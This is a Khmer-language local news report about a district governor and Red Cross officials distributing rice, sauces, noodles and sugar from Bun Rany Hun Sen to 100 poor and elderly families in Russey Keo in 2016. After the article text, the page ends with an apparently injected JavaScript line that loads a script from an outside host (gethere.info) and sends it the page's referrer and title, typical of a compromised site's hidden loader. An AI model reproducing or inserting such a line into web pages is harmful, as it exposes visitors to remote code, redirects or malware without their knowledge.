លោកជា ពិសី អភិបាលខណ្ឌឬស្សី កែវ នាំអំណោយថ្លៃថ្លាសម្តេចកិត្តិព្រឹទ្ធបណ្ឌិត ចែកជូនពលរដ្ឋ១០០គ្រួសារ នៅសង្កាត់ច្រាំងចំរេះ១(video)
ពិសី អភិបាលនៃគណ:អភិបាលខណ្ឌឬស្សីកែវ និងជាប្រធានអនុ សាខាកាកបាទក្រហមកម្ពុជាខណ្ឌ រួមដំណើរ ដោយលោកស្រី អាន ផល្លា ប្រធានសមាគមនារី ខណ្ឌ, យុវជនកាកបាទក្រហមខណ្ឌ និងលោកចៅសង្កាត់ បាននាំយកនូវអំណោយដ៏ថ្លៃថ្លារបស់សម្តេចកិត្តិព្រឹទ្ធបណ្ឌិត ប៊ុន រ៉ានី ហ៊ុន សែន ប្រធានកាកបាទក្រហមកម្ពុជា មកចែកជូនបងប្អូនប្រជាពលរដ្ឋជា ជនចាស់ជរា ជនទីទ័លក្រ ចំនួន១០០គ្រួសារ ចុះតាមខ្នងផ្ទះ កាលពីព្រឹកថ្ងៃទី២៦ ខែមិថុនា ឆ្នាំ២០១៦ ស្ថិតក្នុងសង្កាត់ច្រាំងចំរេះ១ ខណ្ឌឬស្សីកែវ ។
ដោយក្នុងនោះអំណោយដែលបាននាំយកមកចែកជូនបងប្អូនសរុបមានអង្ករ ៥០០គីឡូក្រាម-ទឹកស៊ីអីវ ១០០ដប -ទឹកត្រី ១០០ដប -មី ៤០០កញ្ចប់ -ស្កស ១០០គីឡូ។ ដោយឡែកប្រធានសមាគមនារីខណ្ឌលោកស្រី អាន ផល្លា បានឧបត្ថម្ភនូវបន្ថែមនូវក្រណាត់សំពត់និងក្រណាត់អាវ ជូនចាស់ជរា ចំនួន ១០០នាក់ផងដែរ។
ក្នុងឱកាសនោះផងដែរ លោកជា ពិសី អភិបាលខណ្ឌ ក៏ដូចជា លោកស្រីប្រធានសមាគមន៍នារីខណ្ឌ បាន មានប្រសាសន៍បញ្ជាក់ពីការយកចិត្តទុក្ខដាក់ពីសំណាក់ សម្តេចកិត្តិព្រឹទ្ធបណ្ឌិត ប៉ុន រ៉ានី ហ៊ុន សែន ប្រធានកាកបាទក្រហមកម្ពុជា និងបានពាំនាំមកនូវការផ្តាំផ្ញើសួរសុខទុក្ខ ព្រមទាំងលើកទឹកចិត្តដល់បងប្អូនប្រជាពលរដ្ឋអោយខិតខំប្រកបរបរចិញ្ចឹមជីវិតតាមលទ្ធភាពដែលអាចធ្វើទៅបាន។
ស្ថិតតាមខ្នងផ្ទះ បងប្អូនប្រជាពលរដ្ឋ បានសម្ដែងនូវក្ដីរីករាយ និងមានមតិថ្លែងអំណរគុណយ៉ាងជ្រាលជ្រៅ និងគោរពជូនពរ សម្ដេចកិត្តិព្រឹទ្ធបណ្ឌិត និង ក្រុមគ្រួសារ ដែលលោកតែងតែយកចិត្តទុក្ខដាក់គិតគូរ ដល់ការស់នៅ គិតគូរពីសុខទុក្ខរបស់ប្រជាពលរដ្ឋគ្រប់កាលៈទេសៈ មិនថាសាសនា និន្នាកានយោបាយ ជាតិសាសន៍ណា ឬពណ៌សម្បុអ្វីឡើយ គឺសម្ដេចតែងតែជួយឧបត្ថម្ភជានិច្ច៕
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;